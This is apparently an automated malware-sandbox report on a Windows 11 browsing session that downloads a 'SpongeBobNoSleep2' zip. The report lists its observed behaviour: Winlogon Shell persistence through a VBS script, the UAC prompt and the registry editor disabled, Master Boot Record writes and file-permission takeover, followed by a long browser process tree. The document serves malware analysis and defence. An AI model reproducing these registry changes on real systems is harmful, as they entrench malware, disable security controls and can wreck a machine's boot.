Analysis
max time kernel: 368s
max time network: 412s
platform: windows11-21h2_x64
resource: win11-20241023-en
resource tags: arch:x64, arch:x86, image:win11-20241023-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 05-11-2024 05:04
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://github.com
Resource
win11-20241023-en
Errors
General
-
Target
http://github.com
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
gdifuncs.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\""
Processes:
gdifuncs.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
Disables RegEdit via registry modification 1 IoCs
Processes:
gdifuncs.exe: Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 4 IoCs
Processes:
PID 5392 takeown.exe
PID 2876 icacls.exe
PID 1956 takeown.exe
PID 2276 icacls.exe
Executes dropped EXE 3 IoCs
Processes:
PID 4792 mbr.exe
PID 2744 MainWindow.exe
PID 4992 gdifuncs.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes:
PID 5392 takeown.exe
PID 2876 icacls.exe
PID 1956 takeown.exe
PID 2276 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
Processes:
flow 261: https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
mbr.exe: File opened for modification \??\PhysicalDrive0
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"
Drops file in Windows directory 4 IoCs
Processes:
cmd.exe: File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav
cmd.exe: File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav
cmd.exe: File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe
cmd.exe: File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
SpongebobNoSleep2.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
mbr.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
MainWindow.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
gdifuncs.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Delays execution with timeout.exe 1 IoCs
Processes:
PID 756 timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exe: Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS
msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
msedge.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
Kills process with taskkill 1 IoCs
Processes:
PID 4456 taskkill.exe
Modifies Control Panel 3 IoCs
Processes:
gdifuncs.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
gdifuncs.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
gdifuncs.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur"
Modifies registry class 5 IoCs
Processes:
msedge.exe: Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings
BackgroundTransferHost.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix
BackgroundTransferHost.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"
BackgroundTransferHost.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"
BackgroundTransferHost.exe: Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\MuiCache
NTFS ADS 1 IoCs
Processes:
msedge.exe: File opened for modification C:\Users\Admin\Downloads\SpongeBobNoSleep2 (HorrorBob5).zip:Zone.Identifier
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
PID 672
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
Token: 33, PID 4492 AUDIODG.EXE
Token: SeIncBasePriorityPrivilege, PID 4492 AUDIODG.EXE
Token: SeDebugPrivilege, PID 4992 gdifuncs.exe
Token: SeDebugPrivilege, PID 4992 gdifuncs.exe
Suspicious use of FindShellTrayWindow 58 IoCs
Suspicious use of SendNotifyMessage 24 IoCs
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
PID 1728 SpongebobNoSleep2.exe
PID 2744 MainWindow.exe
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 1 IoCs
Processes:
gdifuncs.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
Processes

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://github.com
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 4200

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x48,0x10c,0x7ff88aa53cb8,0x7ff88aa53cc8,0x7ff88aa53cd8
    PID: 2704

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
    PID: 400

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 2492

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
    PID: 72

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
    PID: 2356

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
    PID: 1388

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
    PID: 3740

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
    PID: 1728

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
    PID: 2660

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
    PID: 112

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
    PID: 4716

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
    PID: 2448

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
    PID: 3964

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
    PID: 2892

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4680 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 704

  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
    PID: 2292

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
    PID: 3816

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
    PID: 684

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
    PID: 2480

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
    PID: 832

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
    PID: 4984

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3880 /prefetch:8
    PID: 3372

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
    PID: 4584

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6632 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses
    PID: 4448

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
    PID: 956

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:8
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID: 2720

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
    PID: 1888

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
    PID: 236

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
    PID: 4596

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
    PID: 2460

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
    PID: 3432

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
    PID: 404

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
    PID: 648

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:1
    PID: 3296

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1
    PID: 836

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:1
    PID: 3500

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
    PID: 5444

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:1
    PID: 5452

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
    PID: 5600

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:1
    PID: 5792

  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8360 /prefetch:1
    PID: 6120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:12⤵PID:6132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9052 /prefetch:12⤵PID:6140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:12⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:12⤵PID:5248
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:12⤵PID:5936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7968 /prefetch:12⤵PID:5992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9940 /prefetch:12⤵PID:6068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9916 /prefetch:12⤵PID:5876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:12⤵PID:6000
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10072 /prefetch:12⤵PID:6176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10420 /prefetch:12⤵PID:6380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10372 /prefetch:12⤵PID:6452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10012 /prefetch:12⤵PID:6736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10785626873489234798,4840684953776097726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10552 /prefetch:12⤵PID:7092
-
